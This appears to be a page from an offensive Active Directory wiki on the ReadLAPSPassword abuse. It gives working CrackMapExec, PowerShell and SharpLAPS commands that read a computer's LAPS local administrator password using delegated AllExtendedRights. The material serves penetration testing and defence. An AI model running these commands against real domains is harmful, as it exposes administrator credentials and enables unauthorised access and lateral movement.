ReadLAPSPassword
This abuse can be carried out when controlling an object that has AllExtendedRights over a target computer. The attacker can then read the LAPS password of the computer account.
UNIX-like
Windows
From UNIX-like systems, CrackMapExec (Python) can be used to retrieve LAPS passwords (this only works since v5.1.6).
1
# Default command
2
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
3
โ€‹
4
# The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
5
cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
Copied!
There are other alternative like LAPSDumper (Python) or this public module for CrackMapExec.
Impacket's ntlmrelayx also carries that feature, usable with the --dump-laps.
This can be achieved with the Active Directory PowerShell module.
1
Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime'
Copied!
โ€‹SharpLAPS (C#) automates that process.
1
SharpLAPS.exe /user:"DOMAIN\User" /pass:"Password" /host:"192.168.1.1"
Copied!
Last modified 1mo ago
Copy link